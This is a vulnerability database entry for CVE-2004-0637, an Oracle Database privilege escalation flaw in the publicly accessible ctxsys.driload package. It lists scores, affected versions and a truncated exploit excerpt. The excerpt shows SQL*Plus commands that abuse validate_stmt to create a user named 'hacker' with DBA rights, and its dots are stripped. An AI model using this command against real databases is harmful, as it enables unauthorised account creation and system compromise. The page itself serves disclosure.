6.5
CVSSv2

CVE-2004-0637

Published: 02/09/2004 Updated: 10/09/2008
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Oracle Database Server 8.1.7.4 up to and including 9.2.0.4 allows local users to execute commands with additional privileges via the ctxsys.driload package, which is publicly accessible.

Vulnerable Product Search on Vulmon Subscribe to Product

oracle oracle8i standard 8.1.7 .4

oracle oracle9i enterprise 9.2.0.4

oracle oracle9i standard 9.2.0.4

oracle oracle9i standard 9.0.1.3

oracle oracle9i personal 9.2.0.4

oracle oracle8i enterprise 8.1.7 .4

Exploits

source: wwwsecurityfocuscom/bid/11099/info Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA This could compromise the database SQL> exec ctxsysdriloadvalidate_stmt ('create user hacker identified by hacker'); SQL> exec ctxsysdriloadvalidate ...